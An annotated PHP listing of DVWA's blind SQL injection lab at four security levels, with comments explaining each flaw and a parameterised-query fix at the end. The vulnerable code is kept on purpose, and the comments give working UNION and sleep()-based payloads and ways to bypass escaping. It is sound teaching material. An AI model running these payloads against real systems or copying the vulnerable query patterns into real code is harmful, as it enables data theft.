盲注（Blind SQL Injection）：查询的结果集不会显示在页面上，只能借助页面内容或 HTTP 状态码的差异（布尔盲注），或者响应时间的差异（时间盲注，例如 sleep()）来逐位推断数据——像瞎子摸象一样。
Low
// Blind SQL injection, "Low" level (the level names and code match DVWA's
// sqli_blind exercise; the code is left as-is so the flaw can be studied).
// Untrusted input: $_GET['id'] is dropped straight into a single-quoted SQL
// literal with no validation or escaping. The query's rows are never printed,
// so an attacker learns one bit per request: "exists" (HTTP 200) vs "MISSING"
// (HTTP 404), or how long the response took.
// (The mysql_* extension used here was removed in PHP 7.)
if(isset( $_GET[ 'Submit' ])) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    // Injection point: a payload starting with a quote closes the 'literal', and
    // a trailing '#' comments out the closing quote and ';' that follow.
    // (In a GET URL the '#' must be sent as %23, or the browser drops it as a fragment.)
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    // No defence at all — not even a type check.
    // Example payloads (the result set is never displayed, so a plain UNION dump
    // of the table returns nothing visible; only yes/no questions work):
    // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,2 # ';
    //   -> the UNION row makes $num > 0 even if no user 0 exists, so the page
    //      answers "User ID exists in the database." — confirms the injection.
    // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length( database())=4,sleep(4),2) # ';
    //   -> time-based probe: the response is delayed ~4 s only if the database
    //      name is 4 characters long; vary the condition to extract data bit by bit.

    // Errors are suppressed, so there is no error-based channel — that is what
    // makes this "blind" rather than a classic UNION/error-based injection.
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        // The 404 status is a second, machine-readable oracle besides the body text.
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}
Medium
// Blind SQL injection, "Medium" level. Input now arrives via POST and is run
// through mysql_real_escape_string(), but the value is interpolated UNQUOTED
// into the query, so escaping quotes achieves nothing: a purely numeric payload
// ("0 union select ...") contains no character the escaper touches and is
// executed verbatim. Switching to POST only changes how the payload is delivered.
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    // Escapes quotes, backslashes and a few control bytes — only meaningful if
    // $id ends up inside quotes, which it does not (see $getid below). Payloads
    // that need string literals can still avoid quotes (e.g. hex literals, CHAR()).
    $id = mysql_real_escape_string( $id );

    // Check database
    // Injection point: no quotes around $id, so no closing quote or comment marker is needed.
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    // Example payloads:
    // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,2;
    //   -> the UNION row makes $num > 0 and the page says "exists" even for a
    //      non-existent id: confirms the injection.
    // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,if(length(database()) > 4, sleep(3), 2)
    //   -> time-based probe: ~3 s delay iff the database name is longer than 4 characters.

    // Errors still suppressed: no error-based channel.
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        // Unlike the Low level no 404 is sent; the only oracle is the body text.
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}
High
// "High" level. $id is read from the session instead of the request; the page
// that stores it is not shown here, so — as the original annotation assumes —
// treat it as able to carry attacker-controlled text. The only added "defence"
// is LIMIT 1, which caps the row count and is trivially cut off with a '#' comment.
if( isset( $_SESSION['id'])){
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    // Injection point: single-quoted interpolation, exactly as in the Low level.
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    // Nothing new here — merely limiting the number of returned rows cannot stop us.
    // Example payload (the '#' turns the trailing " LIMIT 1;" into a comment):
    // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length(database()) = 4, sleep(3), 2) # LIMIT 1;
    // NOTE(review): this listing echoes first_name/last_name below, so the UNION
    // row's columns are printed in the response — this variant is not actually
    // blind; a plain UNION extracts data directly and sleep() is unnecessary.
    // A failed query dies with a fixed message instead of the MySQL error text,
    // so the error/no-error difference is itself a yes/no oracle.
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        // $id, $first and $last are written into HTML unescaped; if $id carries
        // attacker input this is also a reflected XSS sink — confirm how the
        // session value is populated.
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}
Impossible
// Fourth variant: the fixed implementation. Three controls stack up:
//   1. an anti-CSRF token is verified before anything else;
//   2. the id must pass is_numeric();
//   3. the query is a prepared statement with the id bound as an integer, so
//      the value travels as data and can never change the SQL text.
// checkToken(), generateSessionToken() and $db are defined outside this listing.
if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    // NOTE(review): the token is read from $_REQUEST while the form data comes
    // from $_GET; reading both from $_GET keeps the two channels consistent.
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    // is_numeric() also accepts floats, exponent notation ("1e3") and leading
    // whitespace; such values still cannot inject (they are bound, see below),
    // but how PARAM_INT coerces them is driver-dependent — confirm if exactness matters.
    // Non-numeric input is silently ignored: there is no else branch, so the
    // response is empty.
    if(is_numeric( $id )) {
        // Check the database
        // Parameterised query: the bound value cannot be interpreted as SQL.
        // The protection comes from binding, not from PDO itself — PDO with
        // string interpolation would be as injectable as the mysql_* code above.
        // With emulated prepares (pdo_mysql's default) the quoting happens
        // client-side; PDO::ATTR_EMULATE_PREPARES => false on $db makes the
        // server do it with true server-side prepares.
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        // rowCount() after a SELECT is not guaranteed by every PDO driver (it
        // works for pdo_mysql with buffered queries); fetching a row is portable.
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            // The exists/missing oracle remains, but it now reveals only what the
            // feature is meant to: whether a given numeric id exists.
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
// Presumably issues a fresh token for the next request (defined elsewhere).
generateSessionToken();